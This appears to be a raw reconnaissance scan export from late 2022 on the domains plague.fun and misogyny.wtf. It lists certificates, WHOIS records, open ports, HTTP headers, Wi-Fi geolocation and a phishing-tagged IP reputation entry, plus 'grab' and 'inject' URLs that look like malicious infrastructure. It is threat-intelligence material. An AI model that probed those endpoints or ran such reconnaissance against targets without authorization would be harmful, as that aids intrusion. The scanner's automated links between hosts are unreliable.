1e:e2:d1:86:fe:ed:a0:95:8f:1e:1f:b8:a0:64:8a: 03:2e:24:de:da:18:02:31:72:4c:bc:08:b8:b9:7d: 37:68:59:71:ff:34:47:3a:f5:31:0a:7b:e3:d7:a4: 57:9a:28:af:cb:cb:02:23:42:43:84:37:4b:43:a3: 7c:16:14:5c:c2:31:5d:41:8d:54:c0:19:2e:fc:1a: 1e:00:56:d0:6f:f0:7b:c7:06:ee:1d:32:f2:21:a6: 9b:2e:bf:1e:72:64:69:22:a6:bd:c9:5c:55:eb:28: 7f:90:ac:ce:a3:a0:3c:70:26:56:e2:ce:7e:0a:78: 11:31:a1:34:1f:1e:da:ce:6d:10:0d:02:88:dc:c0: 6a:29:a9:37:1f:9f:89:b4:a9:22:a8:7c:2d:4a:8f: a5:88:bf:b8:15:de:16:82:69:48:6c:4a:f5:1e:ac: 25:5f:c9:ac:67:4a:56:29:88:80:5a:e0:c0:f1:e2: 75:07 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: D2:0D:67:35:38:EF:6A:3B:4A:2F:E7:A1:89:80:E8:46:87:08:00:70 X509v3 Authority Key Identifier: keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1 Authority Information Access: OCSP - URI:http://ocsp.int-x3.letsencrypt.org CA Issuers - URI:http://cert.int-x3.letsencrypt.org/ X509v3 Subject Alternative Name: DNS:plague.fun, DNS:www.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 0e:22:1f:09:1d:3d:f2:a6:56:13:ca:71:a1:f1:df:01:e3:a6: 3f:9c:32:18:33:9a:9e:03:e1:03:75:5d:71:67:87:df:6d:e2: 43:6a:57:fe:b2:07:45:21:a4:be:24:e4:56:c4:a2:eb:a5:14: 4b:4a:63:6b:c6:27:28:30:97:f4:e1:f0:5f:cf:bf:12:44:53: 42:30:cb:bb:0e:c2:5e:6b:8e:5b:df:55:04:97:7b:33:7b:bc: a1:a9:7e:3d:26:d0:78:09:75:c3:08:0b:87:0f:93:53:31:2a: c0:3a:fa:9d:58:f0:22:ac:3e:92:f3:5f:60:6e:cd:84:23:0d: 5f:08:3b:42:63:af:f2:fd:4f:00:83:40:87:55:e9:b4:39:a1: 79:89:fd:fa:e2:ce:06:03:d9:e8:f9:c5:e3:5c:75:c1:2c:23: 7e:f2:fb:cf:ab:27:08:74:52:95:dd:ab:31:8b:30:8c:d2:ea: 0c:9c:98:c9:31:56:59:24:78:61:c5:53:eb:ef:10:f7:89:3e: be:f1:1d:56:6f:34:5d:cb:20:69:ea:f4:3c:21:6e:5b:da:3a: 43:b4:e9:b4:7f:c5:f0:d4:09:90:0b:0d:60:98:7e:6a:39:5f: be:15:9f:d9:08:8f:c9:7a:3c:38:73:bf:7d:1c:46:33:0c:33: 74:8b:ba:1c 2022-12-18 00:03:22 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None www.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:d8:e8:f9:6e:af:5c:60:20:62:8a:c9:01:2c:b1:dd:b1:ef Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 Validity Not Before: Aug 27 16:08:50 2020 GMT Not After : Nov 25 16:08:50 2020 GMT Subject: CN=www.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a4:9b:a5:f9:88:bf:e3:84:c3:a7:20:d1:1a:68: 2a:3d:5d:5c:4b:72:46:33:3f:80:e8:7a:45:73:6a: cd:07:c0:56:2b:61:7f:4c:56:dd:e0:bd:ef:24:8e: 73:91:7b:f0:e5:0c:c8:6a:13:46:77:1a:e3:50:81: 51:d2:1d:d8:a1:35:fa:0b:fa:09:37:00:58:4e:31: 83:0e:f7:07:90:d0:0e:1e:4d:7e:52:e1:04:8b:4e: b1:28:95:49:9e:2d:53:a9:b6:0f:7d:c4:07:f0:5a: 9d:50:36:ef:b8:7b:f9:ad:59:38:88:93:89:af:c3: 25:b9:9a:a0:2e:13:8b:7e:ed:0b:3a:98:fc:89:52: 7d:f8:41:c4:2e:8d:b6:b3:09:f9:43:e5:70:bd:bd: 74:fa:e6:70:2e:e6:54:b0:82:97:a8:a9:e0:71:03: a4:73:0a:ae:0c:e7:ea:53:a5:24:3c:09:c1:da:78: ee:a9:b7:a3:8f:a6:db:2e:69:3a:ea:08:50:68:13: bd:77:60:e1:be:f1:69:20:d6:c3:b2:82:61:86:74: b7:1a:f9:fa:f1:1b:dd:5c:9c:a4:ac:c0:af:83:49: 29:00:9f:75:fc:61:8b:3c:71:21:e2:a1:7a:40:65: 1b:63:de:97:d8:3d:55:8f:6f:0b:4d:52:7c:3f:82: f7:c3 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: CF:A0:FE:3E:4E:5F:7F:0F:22:5E:1D:C3:E8:1E:94:AD:7F:15:41:85 X509v3 Authority Key Identifier: keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1 Authority Information Access: OCSP - URI:http://ocsp.int-x3.letsencrypt.org CA Issuers - URI:http://cert.int-x3.letsencrypt.org/ X509v3 Subject Alternative Name: DNS:plague.fun, DNS:www.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 5E:A7:73:F9:DF:56:C0:E7:B5:36:48:7D:D0:49:E0:32: 7A:91:9A:0C:84:A1:12:12:84:18:75:96:81:71:45:58 Timestamp : Aug 27 17:08:50.981 2020 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:E9:D1:8E:C9:41:10:F7:76:A6:BA:D6: 32:C6:7C:E4:FA:59:5D:B0:EF:87:B8:C3:44:9D:A2:53: 6E:CD:12:20:93:02:20:00:84:8D:90:68:C5:A0:5F:74: 2D:C3:F0:C9:D8:4C:E9:56:69:A4:F0:0E:14:DE:8B:F0: 59:01:40:A7:56:3F:F4 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 07:B7:5C:1B:E5:7D:68:FF:F1:B0:C6:1D:23:15:C7:BA: E6:57:7C:57:94:B7:6A:EE:BC:61:3A:1A:69:D3:A2:1C Timestamp : Aug 27 17:08:51.044 2020 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:52:4E:25:21:1E:5A:C7:E2:2D:08:B5:85: 4F:11:22:CF:31:4E:D7:0A:D1:72:EC:DB:B6:13:1A:38: F4:4C:29:AD:02:20:78:1F:9F:EE:99:31:D2:F8:4D:00: 78:EA:12:77:C5:F9:6B:D0:BF:36:08:19:4D:15:F1:F5: 55:7A:C1:E9:C8:4C Signature Algorithm: sha256WithRSAEncryption 85:d6:5e:fe:7a:81:62:58:24:6d:26:a2:ae:e6:1d:8e:3e:ba: ae:26:4e:ba:0d:85:7c:95:f0:bc:55:f1:87:5e:67:bb:5f:e1: e4:26:28:75:34:87:50:e0:1b:62:3a:4b:eb:c8:bd:8f:50:e4: 53:a4:ac:3f:f9:38:25:0e:15:6b:4f:c7:67:d3:fa:70:c7:d8: e6:29:7c:90:6f:27:66:e9:f5:0e:bb:c0:37:3f:d6:f0:3e:21: 9e:b0:b8:76:26:54:83:8a:fe:90:49:ef:2a:f3:e5:68:ce:60: 8c:10:ba:5d:dd:97:0c:38:c5:44:72:66:52:e5:2b:15:82:2c: a8:ff:00:cf:13:af:d8:85:8e:b7:94:56:b9:3c:50:fb:4b:f3: f4:b1:1b:02:ac:11:cf:97:e8:b0:9f:b1:4b:e0:25:83:48:5e: 84:aa:e8:fa:27:7b:6e:2c:d0:98:82:40:a3:d9:c9:8a:54:15: 92:ed:13:d9:2d:d1:43:51:24:33:9e:a2:27:0c:d2:80:1e:c6: 07:b5:84:f5:6c:f3:78:7a:e5:6f:f7:bd:ab:4c:36:29:44:d0: 99:8c:64:14:17:e8:e9:72:22:0b:02:b5:cc:61:4e:62:b2:15: 5b:7e:aa:29:5e:33:6d:cc:4c:4b:ad:d7:24:75:0b:37:e1:8b: 0d:4e:40:4d 2022-12-18 00:21:02 Open TCP Port No Censys 0 0 2 0 None 104.21.28.240:2082 104.21.28.240 2022-12-18 00:20:19 BGP AS Membership No RIPE 0 0 4 0 None 12363 195.110.124.0/24 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 7717 7361 (Net ID: 00:00:C5:FC:FE:34) 37.7803446,-122.3906132 2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.147.230 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77afa301383c2a6c-ORD"]} 188.114.97.1 2022-12-18 00:09:33 Open TCP Port No LeakIX 0 0 2 0 None 104.21.27.242:443 104.21.27.242 2022-12-18 00:08:40 BGP AS Membership No RIPE 0 0 3 0 None 3215 90.116.0.0/16 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None dvdbeyond (Net ID: 00:01:24:F2:B3:12) 37.7803446,-122.3906132 2022-12-18 00:08:16 Netblock Membership No RIPE 0 0 1 0 None 20.192.0.0/10 20.224.2.213 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.137.37 2022-12-18 00:26:18 Physical Location No MetaDefender 0 0 2 0 None Campinas, Brazil 20.226.56.97 2022-12-18 00:21:13 BGP AS Membership No Censys 0 0 2 0 None 13335 188.114.97.0 2022-12-18 00:13:36 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@cloudflare.com {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'whitelist', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2022-06-23 00:42:25', u'asn_date': u'2015-02-25 00:00:00', u'tag': [u'phishing'], u'postal_code': u'94107', u'is_mining_pool': False, u'ip_addr': u'172.67.137.37', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'San Francisco', u'last_updated': u'2021-05-26 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 37.751, u'lon': -97.822}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'description': u'Phishing', u'labels': [u'compromised'], u'source': u'OpenPhish', u'first_seen': u'2022-06-23 00:42:25', u'last_seen': u'2022-06-24 12:40:18'}], u'modification_time': u'2022-10-03 13:47:50', u'asn_cidr': u'172.67.128.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': True, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 2022-12-18 00:11:10 Similar Domain - Whois No Whois 2 0 2 0 None %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: plague.fr status: ACTIVE eppstatus: active hold: NO holder-c: ANO00-FRNIC admin-c: ANO00-FRNIC tech-c: OVH5-FRNIC registrar: OVH Expiry Date: 2023-01-30T04:23:37Z created: 2014-01-30T04:23:37Z last-update: 2022-01-30T04:35:23Z source: FRNIC nserver: dns107.ovh.net nserver: ns107.ovh.net source: FRNIC key1-tag: 10120 key1-algo: 8 [RSASHA256] key1-dgst-t: 8 [SHA256] key1-dgst: 5BD52D51E250B4CC173D1D59D9A7F23891B3311873364A4F9B2B612EF4CDDD58 source: FRNIC registrar: OVH address: 2 Rue Kellermann address: 59100 ROUBAIX country: FR phone: +33.899701761 fax-no: +33.320200958 e-mail: support@ovh.net website: http://www.ovh.com anonymous: No registered: 1999-10-18T00:00:00Z source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: OVH changed: 2019-01-04T14:49:13Z anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: OVH anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: OVH5-FRNIC type: ORGANIZATION contact: OVH NET address: OVH address: 140, quai du Sartel address: 59100 Roubaix country: FR phone: +33.899701761 e-mail: tech@ovh.net registrar: OVH changed: 2022-12-17T20:33:44.519173Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:10.534955Z <<< plague.fr 2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:443 172.67.169.215 2022-12-18 00:22:07 BGP AS Membership No Censys 0 0 2 0 None 15169 34.149.204.188 2022-12-18 00:06:37 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.96.1:8080 188.114.96.1 2022-12-18 00:03:08 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:54:d1:cf:73:f4:06:da:67:36:31:1b:04:19:11:b7:02:21 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:41:57 2022 GMT Not After : Jun 6 17:41:56 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:99:c4:36:4d:b6:7c:39:c2:f1:77:60:a8:ba:f8: 1c:59:3e:dd:96:42:44:67:b8:8b:49:69:58:1a:9d: ae:aa:d4:88:d9:2c:d6:c2:df:95:1d:df:ac:20:80: f6:6c:90:00:e7:ce:f6:99:5d:a6:86:c6:4c:71:e4: 0a:11:87:6e:9d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 7C:C0:30:0A:42:D8:F4:C5:D8:B9:9F:B1:0D:6A:DF:8F:DE:76:96:BE X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:73:c9:51:81:24:54:60:50:42:94:ed:53:88:10: 89:96:e7:79:87:b5:b8:53:60:60:89:dc:82:36:ca:08:8a:16: 39:38:0a:9b:7a:23:19:6f:4f:5a:30:1f:e5:6c:76:40:02:30: 3d:be:52:da:80:dc:a2:9d:50:94:22:a3:e3:f8:29:ec:b0:25: 63:d5:de:74:71:c9:c1:71:0e:8c:0d:1d:3a:6e:b9:c4:0a:9e: 23:22:2b:9c:de:86:d5:f4:68:f3:3f:5b plague.fun 2022-12-18 00:21:47 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b2ce24691b2ada-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2606:4700:3032::ac43:8925 2022-12-18 00:13:15 Internet Name No DNS Brute-forcer 7 1 1 0 None autoconfig.zerotwo-best-waifu.online zerotwo-best-waifu.online 2022-12-18 00:04:00 Physical Location No ipstack 0 0 1 0 None Switzerland 51.103.210.236 2022-12-18 00:16:27 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None sni.cloudflaressl.com 188.114.97.9 2022-12-18 00:09:42 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.15:8443 188.114.96.0/24 2022-12-18 00:13:47 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None info@nettalk.nl %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: rasputin.fr status: ACTIVE eppstatus: active hold: NO holder-c: DA10525-FRNIC admin-c: DA10525-FRNIC tech-c: DA10525-FRNIC registrar: SONEXO B.V Expiry Date: 2023-08-06T23:33:00Z created: 2018-08-06T23:33:00Z last-update: 2022-08-06T23:35:46Z source: FRNIC nserver: ns1.sonexo.eu nserver: ns2.sonexo.com source: FRNIC key1-tag: 581 key1-algo: 8 [RSASHA256] key1-dgst-t: 8 [SHA256] key1-dgst: 4941121364626216209F295028F9A30785FE7E5C365AF39EB6A093CD2AF41311 source: FRNIC registrar: SONEXO B.V address: Edeseweg 52 - address: 6721 JX Bennekom country: NL phone: +31.308200291 fax-no: +31.302711470 e-mail: info@sonexo.nl website: http://www.sonexo.nl anonymous: No registered: 2014-04-21T00:00:00Z source: FRNIC nic-hdl: DA10525-FRNIC type: ORGANIZATION contact: NetTalk address: NetTalk address: Postbus 447 address: 6710BK Ede country: NL phone: +31.850160612 fax-no: +31.850160613 e-mail: info@nettalk.nl registrar: SONEXO B.V changed: 2017-02-25T15:15:13Z anonymous: NO obsoleted: NO eppstatus: serverUpdateProhibited eppstatus: associated eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.072571Z <<< 2022-12-18 00:18:35 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.15:443 188.114.97.0/24 2022-12-18 00:26:11 Physical Location No MetaDefender 0 0 2 0 None Campinas, Brazil 20.226.83.185 2022-12-18 00:21:13 Open TCP Port No Censys 0 0 2 0 None 188.114.97.0:2087 188.114.97.0 2022-12-18 00:08:42 Open TCP Port No LeakIX 0 0 1 0 None 51.103.210.236:80 51.103.210.236 2022-12-18 00:12:31 URL (Purely Static) No Page Information 0 0 3 0 None http://misogyny.wtf/grab/UsRjS959Rqm4sPG4 403 Forbidden

Forbidden

You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.

2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77a9199eebd6218b-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.169.215 2022-12-18 00:21:37 Open TCP Port No Censys 0 1 2 0 None 20.226.83.185:3389 20.226.83.185 2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.28.240 2022-12-18 00:09:39 Co-Hosted Site No HackerTarget 0 0 2 0 None 733rr.com 172.67.147.230 2022-12-18 00:04:01 Physical Location No ipstack 0 0 2 0 None Colombia 188.114.96.0 2022-12-18 00:14:36 HTTP Status Code No Web Spider 0 0 2 0 None None http://misogyny.wtf:1337/inject/UsRjS959Rqm4sPG4/ 2022-12-18 00:24:06 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None abuse@register.it Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-01-13T08:14:30Z Creation Date: 2010-01-12T13:36:45Z Registry Expiry Date: 2023-01-12T13:36:45Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:22:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-02-14T00:00:00Z Creation Date: 2010-01-12T00:00:00Z Registrar Registration Expiration Date: 2023-01-12T00:00:00Z Registrar: REGISTER S.P.A. Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:22:21Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:07:17 Web Content No Web Spider 2 0 2 0 None 403 Forbidden

Forbidden

You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.

http://misogyny.wtf/inject/UsRjS959Rqm4sPG4 2022-12-18 00:08:41 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf Certificate: Data: Version: 3 (0x2) Serial Number: 39:2f:d3:a5:c8:f5:ab:d1:13:70:69:a5:1d:f6:ba:07 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Jul 23 20:45:10 2022 GMT Not After : Oct 21 20:45:09 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:dd:77:38:dd:67:be:04:81:c0:b1:0d:6f:43:99: 17:1b:56:53:b9:17:af:64:3b:db:00:b5:b8:7c:25: 11:ca:e7:8a:7b:2f:0a:f4:97:d7:26:7a:4e:9d:27: 18:8a:ce:26:eb:6f:60:61:e7:f3:23:c3:fe:48:ac: f5:31:17:09:86:85:51:e5:0c:19:9e:49:1c:67:5e: 65:fb:75:4f:9d:9c:e4:00:bf:2e:75:c8:46:18:09: 3e:b8:93:7f:88:dd:aa:a0:2d:94:64:7f:46:c7:ef: 20:52:0d:91:c5:b8:36:52:e0:aa:42:16:8d:e4:45: ca:05:9f:06:1f:3f:47:0e:cd:b3:fb:c9:74:c8:8f: 79:44:2f:2a:f3:fd:c1:97:15:f3:c5:37:82:ff:7c: 2e:b3:71:5d:47:f2:c2:4b:28:a6:60:ca:18:57:3f: 26:b0:f7:a5:ee:2c:59:15:a2:04:f0:95:0e:98:e4: 8a:f7:33:0f:bb:31:08:43:47:16:7c:60:32:0f:95: fa:20:5b:b8:eb:f5:84:bf:e7:94:a6:24:35:89:97: 88:ac:0f:3d:69:c4:26:dd:dc:b4:1b:96:22:d0:0b: 